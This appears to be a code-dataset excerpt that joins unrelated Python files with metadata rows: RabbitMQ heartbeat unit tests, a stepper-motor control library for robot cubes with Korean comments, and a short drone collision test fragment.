body = 'ping'
res = self.test_manager.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_manager.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
self.test_manager._process_ping(blocking_channel, method,
properties, body)
# By re-declaring the queue again we can get the number of messages
# in the queue.
res = self.test_manager.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
self.assertEqual(0, res.method.message_count)
except Exception as e:
self.fail("Test failed: {}".format(e))
def test_proc_ping_send_hb_does_not_raise_msg_not_del_exce_if_hb_not_routed(
self) -> None:
try:
self.test_manager._initialise_rabbitmq()
# initialise
blocking_channel = self.test_manager.rabbitmq.channel
method = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
properties = pika.spec.BasicProperties()
body = 'ping'
self.test_manager._process_ping(blocking_channel, method,
properties, body)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager, "_send_heartbeat")
def test_process_ping_send_hb_raises_amqp_connection_err_on_connection_err(
self, hb_mock) -> None:
hb_mock.side_effect = pika.exceptions.AMQPConnectionError('test')
try:
self.test_manager._initialise_rabbitmq()
# initialise
blocking_channel = self.test_manager.rabbitmq.channel
method = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
properties = pika.spec.BasicProperties()
body = 'ping'
self.assertRaises(pika.exceptions.AMQPConnectionError,
self.test_manager._process_ping, blocking_channel,
method, properties, body)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager, "_send_heartbeat")
def test_process_ping_send_hb_raises_amqp_chan_err_on_chan_err(
self, hb_mock) -> None:
hb_mock.side_effect = pika.exceptions.AMQPChannelError('test')
try:
self.test_manager._initialise_rabbitmq()
# initialise
blocking_channel = self.test_manager.rabbitmq.channel
method = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
properties = pika.spec.BasicProperties()
body = 'ping'
self.assertRaises(pika.exceptions.AMQPChannelError,
self.test_manager._process_ping, blocking_channel,
method, properties, body)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager, "_send_heartbeat")
def test_process_ping_send_hb_raises_exception_on_unexpected_exception(
self, hb_mock) -> None:
hb_mock.side_effect = self.test_exception
try:
self.test_manager._initialise_rabbitmq()
# initialise
blocking_channel = self.test_manager.rabbitmq.channel
method = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
properties = pika.spec.BasicProperties()
body = 'ping'
self.assertRaises(PANICException, self.test_manager._process_ping,
blocking_channel, method, properties, body)
except Exception as e:
self.fail("Test failed: {}".format(e))
| 47.855464
| 85
| 0.631393
| 9,284
| 81,450
| 5.162753
| 0.042546
| 0.043229
| 0.068536
| 0.039828
| 0.877136
| 0.859548
| 0.837245
| 0.820325
| 0.800275
| 0.789051
| 0
| 0.007212
| 0.298588
| 81,450
| 1,701
| 86
| 47.883598
| 0.83177
| 0.084481
| 0
| 0.744322
| 0
| 0
| 0.046873
| 0.01714
| 0
| 0
| 0
| 0
| 0.071062
| 1
| 0.023443
| false
| 0.009524
| 0.017582
| 0
| 0.041758
| 0.000733
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a4972f167a0a0247df433a711635da80c74b219
| 30,493
|
py
|
Python
|
pingpong/operations/stepper/stepperoperationbase.py
|
navyzal/PointTracking_Gesture
|
8210aa83dcbe35db62d2578f430d3397c8cfe10d
|
[
"Apache-2.0"
] | 13
|
2021-08-02T04:16:18.000Z
|
2022-02-24T18:37:57.000Z
|
pingpong/operations/stepper/stepperoperationbase.py
|
navyzal/PointTracking_Gesture
|
8210aa83dcbe35db62d2578f430d3397c8cfe10d
|
[
"Apache-2.0"
] | null | null | null |
pingpong/operations/stepper/stepperoperationbase.py
|
navyzal/PointTracking_Gesture
|
8210aa83dcbe35db62d2578f430d3397c8cfe10d
|
[
"Apache-2.0"
] | 16
|
2021-08-02T15:33:56.000Z
|
2022-03-28T14:23:37.000Z
|
from protocols.generateprotocol import GenerateProtocol
from operations.stepper.stepperoperationutils import StepperOperationUtils
import time
class StepperOperationBase():
def __init__(self, number, group_id, robot_status, start_check, write):
self._GenerateProtocolInstance = GenerateProtocol(number, group_id)
self._robot_status = robot_status
self._start_check_copy = start_check
self._write_copy = write
### robot_status 얻기
def _get_robot_status(self, group_id, status, variable):
return eval("self._robot_status[{}].{}.{}".format(group_id, status, variable))
### robot_status 설정
def _set_robot_status(self, group_id, status, variable, value):
exec("self._robot_status[{}].{}.{} = {}".format(group_id, status, variable, value))
class ContinuousStepperOperation(StepperOperationBase):
def __init__(self, number, group_id, robot_status, start_check, write):
StepperOperationBase.__init__(self, number, group_id, robot_status, start_check, write)
### 컨티뉴 모드 모터 작동
def run_motor_continue(self,
cube_ID_list="all",
speed_list=None,
pause_list=False,
group_id=None,
speed_option="RPM",
wait=0) -> None:
group_id = StepperOperationUtils.proc_group_id(self._GenerateProtocolInstance._group_id, group_id)
### 연결 개수
connection_number = self._robot_status[group_id].controller_status.connection_number
### 시작 체크
self._start_check_copy()
### cube_ID, speed, pause 리스트화
cube_ID_list = StepperOperationUtils().to_list(cube_ID_list)
speed_list = StepperOperationUtils().to_list(speed_list)
pause_list = StepperOperationUtils().to_list(pause_list)
### 큐브 ID 리스트 처리
cube_ID_list = StepperOperationUtils().process_cube_ID_list(cube_ID_list, connection_number)
### run_number 정의
run_number = StepperOperationUtils().set_run_number(cube_ID_list, connection_number)
### pause 리스트 체크
StepperOperationUtils().check_pause_list(pause_list)
### speed 옵션 체크
StepperOperationUtils().check_speed_option(speed_option)
### wait 체크
StepperOperationUtils().check_wait(wait, run_option="continue")
### 디폴트 설정
speed_list = StepperOperationUtils().set_default(input_list=[speed_list], option_list=[speed_option], run_option="continue")
### speed, pause 길이 체크
StepperOperationUtils().len_check(speed_list, cube_ID_list, connection_number, mode_name="continue", list_name="speed_list", run_number=run_number, run_option="continue")
StepperOperationUtils().len_check(pause_list, cube_ID_list, connection_number, mode_name="continue", list_name="pause_list", run_number=run_number, run_option="continue")
### 속도 제한
speed_list, _ = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync=False, run_option="continue")
### 바이트 확장
cube_ID_list, speed_list, pause_list = StepperOperationUtils().expand_bytes(cube_ID_list, connection_number, run_number, speed_list, pause_list)
### 작동 처리
sending_bytes = b""
for i, cube_ID_element in enumerate(cube_ID_list):
### 멈춤 설정
if speed_list[i] == 0:
pause_list[i] = True # 0일 때 pause로 안 보내면 다음 명령어가 안 먹음
### status 등록
self._robot_status[group_id].controller_status.stepper_mode[cube_ID_element] = "continue"
self._robot_status[group_id].controller_status.stepper_speed[cube_ID_element] = speed_list[i]
self._robot_status[group_id].controller_status.stepper_pause[cube_ID_element] = pause_list[i]
### bytes 붙이기
sending_bytes += self._GenerateProtocolInstance.SetContinuousSteps_bytes(cube_ID_element, speed_list[i], group_id, pause_list[i])
### agg로 설정
if connection_number > 1:
sending_bytes = self._GenerateProtocolInstance.SetAggregateSteps_bytes(group_id, sending_bytes)
### 바이트 쓰기
self._write_copy(sending_bytes)
### agg 설정이 올 때까지 잡아두기
StepperOperationUtils().wait_until_agg_set(self._get_robot_status, self._set_robot_status, group_id, connection_number)
### sleep
if wait != 0:
time.sleep(wait + 0.3)
time.sleep(0.2)
class SingleStepsStepperOperation(StepperOperationBase):
def __init__(self, number, group_id, robot_status, start_check, write):
StepperOperationBase.__init__(self, number, group_id, robot_status, start_check, write)
### 스텝 모드 모터 작동
def run_motor_step(self,
cube_ID_list="all",
speed_list=None,
step_list=None,
pause_list=False,
time_list=None,
group_id=None,
speed_option="RPM",
step_option="CYCLE",
sync=False,
time_option=None,
wait=0) -> None:
group_id = StepperOperationUtils.proc_group_id(self._GenerateProtocolInstance._group_id, group_id)
### 연결 개수
connection_number = self._robot_status[group_id].controller_status.connection_number
### 시작 체크
self._start_check_copy()
### cube_ID, speed, step, pause 리스트화
cube_ID_list = StepperOperationUtils().to_list(cube_ID_list)
speed_list = StepperOperationUtils().to_list(speed_list)
step_list = StepperOperationUtils().to_list(step_list)
pause_list = StepperOperationUtils().to_list(pause_list)
### 큐브 ID 리스트 처리
cube_ID_list = StepperOperationUtils().process_cube_ID_list(cube_ID_list, connection_number)
### run_number 정의
run_number = StepperOperationUtils().set_run_number(cube_ID_list, connection_number)
### pause 리스트 체크
StepperOperationUtils().check_pause_list(pause_list)
### speed 옵션 체크
StepperOperationUtils().check_speed_option(speed_option)
### step 옵션 체크
StepperOperationUtils().check_step_option(step_option)
### sync 옵션 체크
StepperOperationUtils().check_sync_option(sync)
### time 옵션 체크 & 처리
time_option = StepperOperationUtils().check_time_option(time_option)
### wait 체크
StepperOperationUtils().check_wait(wait, run_option="step")
### 디폴트 설정
speed_list, step_list = StepperOperationUtils().set_default(input_list=[speed_list, step_list], option_list=[speed_option, step_option], run_option="step")
### time 옵션 분기 설정
### time 옵션 없음
if time_option.lower() == "none":
### speed, step 길이 체크
StepperOperationUtils().len_check(speed_list, cube_ID_list, connection_number, mode_name="step", list_name="speed_list", run_number=run_number, run_option="step")
StepperOperationUtils().len_check(step_list, cube_ID_list, connection_number, mode_name="step", list_name="step_list", run_number=run_number, run_option="step")
### 속도, 스텝 제한
speed_list, sleep_list = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync, run_option="step")
step_list, speed_list = StepperOperationUtils().limit_step(step_list, speed_list, sleep_list, step_option, run_number, sync, run_option="step")
### time 옵션 speed 모드
elif time_option.lower() == "speed":
### time, speed 길이 체크
StepperOperationUtils().len_check(time_list, cube_ID_list, connection_number, mode_name="step and time-speed", list_name="time_list", run_number=run_number, run_option="step")
StepperOperationUtils().len_check(speed_list, cube_ID_list, connection_number, mode_name="step and time-speed", list_name="speed_list", run_number=run_number, run_option="step")
### 시간 변환, 속도, 스텝 제한
speed_list, sleep_list = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync, run_option="step")
step_list, _, speed_option, step_option = StepperOperationUtils().convert_time_list(time_list, speed_list, step_list=None, speed_option=speed_option, step_option=None, run_number=run_number, sync=sync, run_option="step", time_option="speed")
step_list, speed_list = StepperOperationUtils().limit_step(step_list, speed_list, sleep_list, step_option="STEP", run_number=run_number, sync=sync, run_option="step")
### time 옵션 step 모드
elif time_option.lower() == "step":
### time, step 길이 체크
StepperOperationUtils().len_check(time_list, cube_ID_list, connection_number, mode_name="step and time-step", list_name="time_list", run_number=run_number, run_option="step")
StepperOperationUtils().len_check(step_list, cube_ID_list, connection_number, mode_name="step and time-step", list_name="step_list", run_number=run_number, run_option="step")
### 시간 변환, 속도, 스텝 제한
speed_list, step_list, speed_option, step_option = StepperOperationUtils().convert_time_list(time_list, speed_list=None, step_list=step_list, speed_option=None, step_option=step_option, run_number=run_number, sync=sync, run_option="step", time_option="step")
speed_list, sleep_list = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync, run_option="step")
step_list, speed_list = StepperOperationUtils().limit_step(step_list, speed_list, sleep_list, step_option="STEP", run_number=run_number, sync=sync, run_option="step")
### pause 길이 체크
StepperOperationUtils().len_check(pause_list, cube_ID_list, connection_number, mode_name="step", list_name="pause_list", run_number=run_number, run_option="step")
### 바이트 확장
cube_ID_list, speed_list, step_list, pause_list = StepperOperationUtils().expand_bytes(cube_ID_list, connection_number, run_number, speed_list, step_list, pause_list)
### sync 모드 처리
speed_list, step_list = StepperOperationUtils().check_time_sync_none(speed_list, step_list, sync, run_number, run_option="step")
### wait 변환 (wait = "step" 또는 "schedule"이면 현재 run_option에 맞춰서 알아서 계산)
if isinstance(wait, str):
wait = StepperOperationUtils().convert_wait(speed_list, step_list, pause_list, run_option="step")
### 작동 처리 (group_id 처리 해야함)
sending_bytes = b""
for i, cube_ID_element in enumerate(cube_ID_list):
### status 등록
self._robot_status[group_id].controller_status.stepper_mode[cube_ID_element] = "step"
self._robot_status[group_id].controller_status.stepper_speed[cube_ID_element] = speed_list[i]
self._robot_status[group_id].controller_status.stepper_step[cube_ID_element] = step_list[i]
self._robot_status[group_id].controller_status.stepper_pause[cube_ID_element] = pause_list[i]
### bytes 붙이기
sending_bytes += self._GenerateProtocolInstance.SetSingleSteps_bytes(cube_ID_element, speed_list[i], step_list[i], group_id, pause_list[i])
if connection_number > 1:
sending_bytes = self._GenerateProtocolInstance.SetAggregateSteps_bytes(group_id, sending_bytes)
### 바이트 쓰기
self._write_copy(sending_bytes)
### agg 설정이 올 때까지 잡아두기
StepperOperationUtils().wait_until_agg_set(self._get_robot_status, self._set_robot_status, group_id, connection_number)
### sleep
if wait != 0:
time.sleep(wait + 0.3)
time.sleep(0.2)
class ScheduledStepsStepperOperation(StepperOperationBase):
def __init__(self, number, group_id, robot_status, start_check, write):
StepperOperationBase.__init__(self, number, group_id, robot_status, start_check, write)
### 스케줄 모드 모터 작동
def run_motor_schedule(self,
cube_ID_list="all",
speed_list=None,
step_list=None,
pause_list=False,
time_list=None,
group_id=None,
speed_option="RPM",
step_option="CYCLE",
sync=False,
time_option=None,
wait=0) -> None:
group_id = StepperOperationUtils.proc_group_id(self._GenerateProtocolInstance._group_id, group_id)
### 연결 개수
connection_number = self._robot_status[group_id].controller_status.connection_number
### 시작 체크
self._start_check_copy()
### cube_ID, speed, step, pause 리스트화
cube_ID_list = StepperOperationUtils().to_list(cube_ID_list)
speed_list = StepperOperationUtils().to_list(speed_list)
step_list = StepperOperationUtils().to_list(step_list)
time_list = StepperOperationUtils().to_list(time_list)
pause_list = StepperOperationUtils().to_list(pause_list)
### 큐브 ID 리스트 처리
cube_ID_list = StepperOperationUtils().process_cube_ID_list(cube_ID_list, connection_number)
### run_number 정의
run_number = StepperOperationUtils().set_run_number(cube_ID_list, connection_number)
### pause 리스트 체크
StepperOperationUtils().check_pause_list(pause_list)
### speed 옵션 체크
StepperOperationUtils().check_speed_option(speed_option)
### step 옵션 체크
StepperOperationUtils().check_step_option(step_option)
### sync 옵션 체크
StepperOperationUtils().check_sync_option(sync)
### time 옵션 체크 & 처리
time_option = StepperOperationUtils().check_time_option(time_option)
### wait 체크
StepperOperationUtils().check_wait(wait, run_option="schedule")
### 디폴트 체크
StepperOperationUtils().set_default(input_list=[speed_list, step_list, time_list], option_list=[speed_option, step_option, time_option], run_option="schedule")
### time 옵션 분기 설정
### time 옵션 없음
if time_option.lower() == "none":
### speed, step 리스트가 list of list인지 체크 (dataframe, array 이용? (numpy, pandas 등 사용))
StepperOperationUtils().check_list_of_list(speed_list, mode_name="schedule", list_name="speed_list", run_option="schedule")
StepperOperationUtils().check_list_of_list(step_list, mode_name="schedule", list_name="step_list", run_option="schedule")
### speed, step 리스트 길이 체크
StepperOperationUtils().len_check(speed_list, cube_ID_list, connection_number, mode_name="schedule", list_name="speed_list", run_number=run_number, run_option="schedule")
StepperOperationUtils().len_check(step_list, cube_ID_list, connection_number, mode_name="schedule", list_name="step_list", run_number=run_number, run_option="schedule")
### 내부 원소 길이 체크
StepperOperationUtils().len_check_elemental_list(speed_list, step_list, mode_name="schedule", input_list1_name="speed_list", input_list2_name="step_list")
### sync 모드일 때 내부 원소 길이 체크
StepperOperationUtils().len_check_elemental_list_in_sync(sync, speed_list, step_list, mode_name="schedule sync", input_list1_name="speed_list", input_list2_name="step_list")
### 속도, 스텝 제한
speed_list, sleep_list = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync, run_option="schedule")
step_list, speed_list = StepperOperationUtils().limit_step(step_list, speed_list, sleep_list, step_option, run_number, sync, run_option="schedule")
### time 옵션 speed 모드
elif time_option.lower() == "speed":
### time, speed 리스트가 list of list인지 체크 (dataframe, array 이용? (numpy, pandas 등 사용))
StepperOperationUtils().check_list_of_list(time_list, mode_name="schedule", list_name="time_list", run_option="schedule")
StepperOperationUtils().check_list_of_list(speed_list, mode_name="schedule", list_name="speed_list", run_option="schedule")
### time, speed 리스트 길이 체크
StepperOperationUtils().len_check(time_list, cube_ID_list, connection_number, mode_name="schedule", list_name="time_list", run_number=run_number, run_option="schedule")
StepperOperationUtils().len_check(speed_list, cube_ID_list, connection_number, mode_name="schedule", list_name="speed_list", run_number=run_number, run_option="schedule")
### 내부 원소 길이 체크
StepperOperationUtils().len_check_elemental_list(time_list, speed_list, mode_name="schedule", input_list1_name="time_list", input_list2_name="speed_list")
### sync 모드일 때 내부 원소 길이 체크
StepperOperationUtils().len_check_elemental_list_in_sync(sync, time_list, speed_list, mode_name="schedule sync", input_list1_name="time_list", input_list2_name="speed_list")
### 시간 변환, 속도, 스텝 제한
speed_list, sleep_list = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync, run_option="schedule")
step_list, _, speed_option, step_option = StepperOperationUtils().convert_time_list(time_list, speed_list, step_list=None, speed_option=speed_option, step_option=None, run_number=run_number, sync=sync, run_option="schedule", time_option="speed")
step_list, speed_list = StepperOperationUtils().limit_step(step_list, speed_list, sleep_list, step_option="STEP", run_number=run_number, sync=sync, run_option="schedule")
### time 옵션 step 모드
elif time_option.lower() == "step":
### time, step 리스트가 list of list인지 체크 (dataframe, array 이용? (numpy, pandas 등 사용))
StepperOperationUtils().check_list_of_list(time_list, mode_name="schedule", list_name="time_list", run_option="schedule")
StepperOperationUtils().check_list_of_list(step_list, mode_name="schedule", list_name="step_list", run_option="schedule")
### time, step 리스트 길이 체크
StepperOperationUtils().len_check(time_list, cube_ID_list, connection_number, mode_name="schedule", list_name="time_list", run_number=run_number, run_option="schedule")
StepperOperationUtils().len_check(step_list, cube_ID_list, connection_number, mode_name="schedule", list_name="step_list", run_number=run_number, run_option="schedule")
### 내부 원소 길이 체크
StepperOperationUtils().len_check_elemental_list(time_list, step_list, mode_name="schedule", input_list1_name="time_list", input_list2_name="step_list")
### sync 모드일 때 내부 원소 길이 체크
StepperOperationUtils().len_check_elemental_list_in_sync(sync, time_list, step_list, mode_name="schedule sync", input_list1_name="time_list", input_list2_name="step_list")
### 시간 변환, 속도, 스텝 제한
speed_list, step_list, speed_option, step_option = StepperOperationUtils().convert_time_list(time_list, speed_list=None, step_list=step_list, speed_option=None, step_option=step_option, run_number=run_number, sync=sync, run_option="schedule", time_option="step")
speed_list, sleep_list = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync, run_option="schedule")
step_list, speed_list = StepperOperationUtils().limit_step(step_list, speed_list, sleep_list, step_option="STEP", run_number=run_number, sync=sync, run_option="schedule")
### pause 길이 체크
StepperOperationUtils().len_check(pause_list, cube_ID_list, connection_number, mode_name="schedule", list_name="pause_list", run_number=run_number, run_option="schedule")
### 바이트 확장
cube_ID_list, speed_list, step_list, pause_list = StepperOperationUtils().expand_bytes(cube_ID_list, connection_number, run_number, speed_list, step_list, pause_list)
### sync 모드 처리
speed_list, step_list = StepperOperationUtils().check_time_sync_none(speed_list, step_list, sync, run_number, run_option="schedule")
### wait 변환 (wait = "step" 또는 "schedule"이면 현재 run_option에 맞춰서 알아서 계산)
if isinstance(wait, str):
wait = StepperOperationUtils().convert_wait(speed_list, step_list, pause_list, run_option="step")
### 작동 처리 (group_id 처리 해야함)
sending_bytes = b""
for i, cube_ID_element in enumerate(cube_ID_list):
### status 등록
self._robot_status[group_id].controller_status.stepper_mode[cube_ID_element] = "point"
self._robot_status[group_id].controller_status.stepper_schedule_point_start[cube_ID_element] = [0]
self._robot_status[group_id].controller_status.stepper_schedule_point_end[cube_ID_element] = [len(speed_list[i])-1]
self._robot_status[group_id].controller_status.stepper_schedule_point_repeat[cube_ID_element] = [1]
self._robot_status[group_id].controller_status.stepper_speed_schedule[cube_ID_element] = speed_list[i]
self._robot_status[group_id].controller_status.stepper_step_schedule[cube_ID_element] = step_list[i]
self._robot_status[group_id].controller_status.stepper_pause[cube_ID_element] = pause_list[i]
self._robot_status[group_id].controller_status.stepper_schedule_sync_on[cube_ID_element] = sync
### bytes 붙이기
sending_bytes += self._GenerateProtocolInstance.SetScheduledSteps_bytes(cube_ID_element, speed_list[i], step_list[i], group_id, True)
if connection_number > 1:
sending_bytes = self._GenerateProtocolInstance.SetAggregateSteps_bytes(group_id, sending_bytes)
### 스케줄 설정 보내기
self._write_copy(sending_bytes)
### 1개 이상이면 agg 설정이 올 때까지 잡아두기
StepperOperationUtils().wait_until_agg_set(self._get_robot_status, self._set_robot_status, group_id, connection_number)
### 포인트로 작동
time.sleep(0.2)
sending_bytes = b""
for i, cube_ID_element in enumerate(cube_ID_list):
sending_bytes += self._GenerateProtocolInstance.SetScheduledPoints_bytes(cube_ID_element, [0], [len(speed_list[i])-1], [1], group_id, pause_list[i])
if connection_number > 1:
sending_bytes = self._GenerateProtocolInstance.SetAggregateSteps_bytes(group_id, sending_bytes)
self._write_copy(sending_bytes)
### sleep
if wait != 0:
time.sleep(wait + 0.3)
time.sleep(0.2)
# 스케줄 설정
def set_motor_schedule(self, cube_ID_list, speed_list, step_list, pause_list=True, time_list=None,
group_id=None, speed_option="RPM", step_option="CYCLE", sync=False, time_option=None,
wait=0) -> None:
group_id = StepperOperationUtils.proc_group_id(self._GenerateProtocolInstance._group_id, group_id)
self.run_motor_schedule(cube_ID_list, speed_list, step_list, pause_list, time_list, group_id, speed_option, step_option, sync, time_option, wait)
return None
class ScheduledPointsStepperOperation(StepperOperationBase):
def __init__(self, number, group_id, robot_status, start_check, write):
StepperOperationBase.__init__(self, number, group_id, robot_status, start_check, write)
# 스케줄 실행
def play_motor_schedule(self,
cube_ID_list="all",
repeat_list=[[1]],
start_point_list=[[None]],
stop_point_list=[[None]],
start_and_stop_list=[[None]],
pause_list=False,
group_id=None,
sync=False,
wait=0) -> None:
"""
Play motors with set schedule.
"""
group_id = StepperOperationUtils.proc_group_id(self._GenerateProtocolInstance._group_id, group_id)
### 연결 개수
connection_number = self._robot_status[group_id].controller_status.connection_number
### start 체크
self._start_check_copy()
### start, stop, repeat 리스트화
start_point_list = StepperOperationUtils().to_list(start_point_list)
stop_point_list = StepperOperationUtils().to_list(stop_point_list)
repeat_list = StepperOperationUtils().to_list(repeat_list)
cube_ID_list = StepperOperationUtils().to_list(cube_ID_list)
pause_list = StepperOperationUtils().to_list(pause_list)
start_and_stop_list = StepperOperationUtils().to_list(start_and_stop_list)
### 큐브 ID 리스트 처리
cube_ID_list = StepperOperationUtils().process_cube_ID_list(cube_ID_list, connection_number)
### run_number 정의
run_number = StepperOperationUtils().set_run_number(cube_ID_list, connection_number)
### 스케줄 셋 체크
for cube_ID_element in cube_ID_list:
if self._robot_status[group_id].controller_status.stepper_speed_schedule[cube_ID_element] == []: # 스케줄이 비었음
raise ValueError("Set schedule before play.")
### pause 리스트 체크
StepperOperationUtils().check_pause_list(pause_list)
### sync 옵션 체크
StepperOperationUtils().check_sync_option(sync)
### wait 체크
StepperOperationUtils().check_wait(wait, run_option="point")
### 변환 & 디폴트 값 넣기
start_point_list, stop_point_list = StepperOperationUtils().set_default(input_list=[start_point_list, stop_point_list, start_and_stop_list], option_list=None, run_option="point")
### list of list 체크
StepperOperationUtils().check_list_of_list(start_point_list, mode_name="point", list_name="start_point_list", run_option="point")
StepperOperationUtils().check_list_of_list(stop_point_list, mode_name="point", list_name="stop_point_list", run_option="point")
StepperOperationUtils().check_list_of_list(repeat_list, mode_name="point", list_name="repeat_list", run_option="point")
### list 길이 체크
StepperOperationUtils().len_check(start_point_list, cube_ID_list, connection_number, mode_name="point", list_name="start_point_list", run_number=run_number, run_option="point")
StepperOperationUtils().len_check(stop_point_list, cube_ID_list, connection_number, mode_name="point", list_name="stop_point_list", run_number=run_number, run_option="point")
StepperOperationUtils().len_check(repeat_list, cube_ID_list, connection_number, mode_name="point", list_name="repeat_list", run_number=run_number, run_option="point")
StepperOperationUtils().len_check(pause_list, cube_ID_list, connection_number, mode_name="point", list_name="pause_list", run_number=run_number, run_option="point")
### 리스트 확장
if cube_ID_list[0] == 0xFF:
cube_ID_list = [i for i in range(connection_number)]
if len(start_point_list) == 1: # 길이가 1이면 run_number 개수만큼 늘림
start_point_list = StepperOperationUtils().list_product_copy(start_point_list, run_number)
if len(stop_point_list) == 1: # 길이가 1이면 run_number 개수만큼 늘림
stop_point_list = StepperOperationUtils().list_product_copy(stop_point_list, run_number)
if len(repeat_list) == 1: # 길이가 1이면 run_number 개수만큼 늘림
repeat_list = StepperOperationUtils().list_product_copy(repeat_list, run_number)
if len(pause_list) == 1: # 길이가 1이면 run_number 개수만큼 늘림
pause_list = pause_list*run_number
### 원소 길이 체크
for start_point_list_element, stop_point_list_element, repeat_list_element in zip(start_point_list, stop_point_list, repeat_list):
if len(start_point_list_element) != len(stop_point_list_element) or len(start_point_list_element) != len(repeat_list_element):
raise ValueError("Start list number, stop list, and repeat list number must be the same.")
### sync 모드 체크
if sync:
if not self._robot_status[group_id].controller_status.stepper_schedule_sync_on[cube_ID_element]:
raise ValueError("In sync mode, set schedule must be in sync mode.")
else:
for start_point_list_element, stop_point_list_element in zip(start_point_list, stop_point_list):
if start_point_list_element != start_point_list[0] or \
stop_point_list_element != stop_point_list_element[0]:
raise ValueError("In sync mode, each point schedule must be the same.")
### 스케줄 셋 체크
speed_length_list = list(map(len, self._robot_status[group_id].controller_status.stepper_speed_schedule))
for i, cube_ID_element in enumerate(cube_ID_list):
for j in range(len(start_point_list[i])):
if isinstance(stop_point_list[i][j], str) and stop_point_list[i][j].lower() == "end":
stop_point_list[i][j] = speed_length_list[cube_ID_element]-1 # end이면 제일 뒤에 인덱스(stop은 마지막 인덱스)
StepperOperationUtils().integer_check(start_point_list[i][j])
StepperOperationUtils().integer_check(stop_point_list[i][j])
StepperOperationUtils().integer_check(repeat_list[i][j])
if start_point_list[i][j] < 0 or stop_point_list[i][j] < 0 \
or speed_length_list[cube_ID_element]-1 < start_point_list[i][j] \
or speed_length_list[cube_ID_element]-1 < stop_point_list[i][j]:
raise ValueError("Unavailable point index. Schedule does not have that index.")
elif stop_point_list[i][j] < start_point_list[i][j]:
raise ValueError("Start index must be less than or equal to stop index.")
if repeat_list[i][j] < 0 or 255 < repeat_list[i][j]:
raise ValueError("Unavailable number. Repeat must be positive, or smaller than 256.")
### wait 처리
if isinstance(wait, str):
wait = StepperOperationUtils().convert_wait_point(cube_ID_list, self._robot_status, group_id, start_point_list, stop_point_list, repeat_list, pause_list)
### 작동 처리 (group_id 처리 해야함)
sending_bytes = b""
for i, cube_ID_element in enumerate(cube_ID_list):
### status 등록
self._robot_status[group_id].controller_status.stepper_mode[cube_ID_element] = "point"
self._robot_status[group_id].controller_status.stepper_pause[cube_ID_element] = pause_list[i]
self._robot_status[group_id].controller_status.stepper_schedule_point_start[cube_ID_element] = start_point_list[i]
self._robot_status[group_id].controller_status.stepper_schedule_point_end[cube_ID_element] = stop_point_list[i]
self._robot_status[group_id].controller_status.stepper_schedule_point_repeat[cube_ID_element] = repeat_list[i]
### 포인트 설정
sending_bytes += self._GenerateProtocolInstance.SetScheduledPoints_bytes(cube_ID_element, start_point_list[i], stop_point_list[i], repeat_list[i], group_id, pause_list[i])
### 바이트 쓰기, 작동
if connection_number > 1:
sending_bytes = self._GenerateProtocolInstance.SetAggregateSteps_bytes(group_id, sending_bytes)
self._write_copy(sending_bytes)
### sleep
if wait != 0:
time.sleep(wait + 0.3)
time.sleep(0.2)
| 67.611973
| 274
| 0.699898
| 3,958
| 30,493
| 4.994694
| 0.055836
| 0.032172
| 0.033386
| 0.028226
| 0.903485
| 0.868683
| 0.844049
| 0.812029
| 0.778643
| 0.742172
| 0
| 0.003187
| 0.197422
| 30,493
| 451
| 275
| 67.611973
| 0.804601
| 0.068311
| 0
| 0.569579
| 1
| 0
| 0.058217
| 0.001999
| 0
| 0
| 0.000143
| 0
| 0
| 1
| 0.038835
| false
| 0
| 0.009709
| 0.003236
| 0.071197
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbe91c329e7cff43a099efe93c0b119b59404f70
| 54,227
|
py
|
Python
|
datagen/img_generator/additional_funcs.py
|
MeRKeZ/DeepDrone_Airsim
|
15043ebf71b5b15e550843856aecfc4cd4fe192a
|
[
"MIT"
] | 2
|
2021-04-21T11:33:01.000Z
|
2021-08-06T07:17:06.000Z
|
datagen/img_generator/additional_funcs.py
|
MeRKeZ/DeepDrone_Airsim
|
15043ebf71b5b15e550843856aecfc4cd4fe192a
|
[
"MIT"
] | null | null | null |
datagen/img_generator/additional_funcs.py
|
MeRKeZ/DeepDrone_Airsim
|
15043ebf71b5b15e550843856aecfc4cd4fe192a
|
[
"MIT"
] | 2
|
2021-09-26T07:51:31.000Z
|
2021-09-26T08:54:55.000Z
|
def test_collision():
phi = - np.pi/9
theta = np.pi/8
psi = pi/2
print "\nDrone Pos x={0:.3}, y={1:.3}, z={2:.3}".format(self.track[0].position.x_val, self.track[0].position.y_val, self.track[0].position.z_val)
